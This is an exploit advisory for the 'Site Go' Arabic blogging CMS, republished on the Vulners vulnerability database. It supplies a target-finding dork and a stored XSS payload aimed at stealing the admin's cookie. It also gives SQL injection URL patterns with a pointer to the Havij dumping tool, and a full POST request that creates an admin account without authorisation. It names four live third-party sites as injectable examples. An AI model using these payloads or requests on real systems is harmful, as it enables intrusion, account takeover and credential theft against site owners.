Vulners
Lucene search
Site Go - multiple Vulnerabilities
##############################################
# Exploit Title: Site Go - multiple Vulnerabilities #
# D0rk: allintitle: "بوابة التدوين" #
# Date: 12.mar.29 #
# Author: L3b-r1'z #
# Email Me : [email protected] \ [email protected] #
# Security : Low #
##############################################
Xss Vuln :
in search b0x , you can put ( <script>alert("Sec3ever")</script> ) And you will se the alert .
ok but this doesn't mean anything ;) , when the owner site open admin panel , he will se the alert ( you can hijacking the coockie )
Why ???
cz everything you write in search bar , Will Registered in Admin Panel ;)
Snap :
http://www10.0zz0.com/2012/03/29/13/713572158.png - pic num 1
http://www10.0zz0.com/2012/03/29/13/570372481.png - pic num 2
|0-0-0-0-0-0-0-0-0-0-0-0-0-0-0|
Sql I Vuln :
Is Too Simple , You Can Get The User and Pass From HAVIJ ;)
http://www.domain.tld/?gallery=class&class=5'
http://www.domain.tld/?gallery=class&class=5''a
http://www.domain.tld/?gallery=class&class=Sql Here
Snap :
http://www10.0zz0.com/2012/03/29/13/229680938.png
Example Site :
http://www.un-web.com/?gallery=class&class=5'
http://asdaa-lb.com/?gallery=ShowImg&Img=1'
http://el3sha.com/?gallery=ShowImg&Img=1'
http://muhageren.com/?articles=topic&topic=5'
|0-0-0-0-0-0-0-0-0-0-0-0-0-0-0|
Add Admin Vuln :
you can add admin from POST ( any tool like HACKBAR )
{
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/site-go/admin/?action=moderators&idm=add
Cookie: style_name=green; article_1=ok; __utma=111872281.668472016.1332650059.1332650059.1332650059.1; __utmz=111872281.1332650059.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=f7d80bbbc41018861f1056662d708699; phpwcmsBELang=en; CookieName=8a110d3sdf6e4558e3434616b750b11f
Content-Type: application/x-www-form-urlencoded
Content-Length: 237
(user=123456&pass=123456&email=L3br1z%40gmail.com&articles_mo=articles_mo&gallery_mo=gallery_mo&songs_mo=songs_mo&video_mo=video_mo&programs_mo=programs_mo&links_mo=links_mo&multi_mo=multi_mo&root_mo=root_mo&B1=%CA%E4%DD%ED%D0&sub_add=yes)
}
Snap :
http://www10.0zz0.com/2012/03/29/13/249898101.png - pic num 1
http://www10.0zz0.com/2012/03/29/13/605608097.png - pic num 2
|0-0-0-0-0-0-0-0-0-0-0-0-0-0-0|
How To Fix :
Add FireWall To Your Admin Panel
|0-0-0-0-0-0-0-0-0-0-0-0-0-0-0|
###################################################################################################
# Greet'z : B0x , Mad Hacker , Mr.Black , Unknown Hacker , Ked-Ans , I-Hmx , Sec4ever , TheInjector , Hacker-1420 .#
# SerialB0y , Rock!n , R0073r , And All Inj3ct0r Members , And All My Friends ;) #
###################################################################################################
# 0day.today [2018-01-02] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Mar 2012 00:00Current
7.1High risk
Vulners AI Score7.1